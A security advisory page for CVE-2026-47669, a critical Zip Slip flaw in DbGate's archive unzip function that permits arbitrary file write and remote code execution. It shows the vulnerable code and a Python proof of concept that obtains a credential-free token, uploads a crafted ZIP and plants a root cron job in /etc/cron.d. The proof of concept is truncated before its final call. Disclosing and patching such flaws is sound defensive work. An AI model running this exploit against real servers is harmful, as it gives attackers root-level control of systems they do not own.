CVE-2026-47669
published 2026-06-05CVE-2026-47669: DbGate: Zip Slip in archive/unzip allows arbitrary file write leading to RCE The `unzipDirectory()` function in `packages/api/src/shell/unzipDirectory.js`…
critical
DbGate: Zip Slip in archive/unzip allows arbitrary file write leading to RCE
The `unzipDirectory()` function in `packages/api/src/shell/unzipDirectory.js` (line 27) does not validate that extracted file paths stay within the output directory. A malicious ZIP with `../` entries writes files anywhere on the filesystem.
In the default Docker deployment, DbGate runs as root and the `none` auth provider issues JWT tokens without credentials via `POST /auth/login`, so this is exploitable by any network-adjacent attacker.
**Affected code:**
`packages/api/src/shell/unzipDirectory.js`, line 27:
```js
const destPath = path.join(outputDirectory, entry.fileName);
// No check that destPath stays within outputDirectory
```
Called from `packages/api/src/controllers/archive.js`, lines 291-293:
```js
async unzip({ folder }) {
const newFolder = await this.getNewArchiveFolder({ database: folder.slice(0, -4) });
await unzipDirectory(path.join(archivedir(), folder), path.join(archivedir(), newFolder));
```
The archive controller also has zero permission checks and zero path traversal protection on any of its endpoints.
**PoC:**
```python
import requests, zipfile, io
TARGET = "http://localhost:3000"
# Get auth token (no credentials needed in default Docker)
r = requests.post(f"{TARGET}/api/auth/login", json={"amoid": "none"})
token = r.json()["accessToken"]
hdrs = {"Authorization": f"Bearer {token}"}
# Create malicious ZIP with path traversal
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
zf.writestr("../../../../../../etc/cron.d/dbgate-pwn",
"* * * * * root id > /tmp/pwned\n")
buf.seek(0)
# Upload ZIP
r = requests.post(f"{TARGET}/api/uploads/upload", headers=hdrs,
files={"data": ("evil.zip", buf, "application/zip")})
info = r.json()
# Save to archive
requests.post(f"{TARGET}/api/archive/save-uploaded-zip", headers=hdrs,
json={"filePath": info["filePath"], "fileName": "evil.zip"})
# Trigger Zip Slip - writes cron job to /etc/cron.d/
requests.post(f"{TARGET}/api/ar
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dbgate | dbgate | >= 0 < 7.1.9 | 7.1.9 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2026-06-05
Published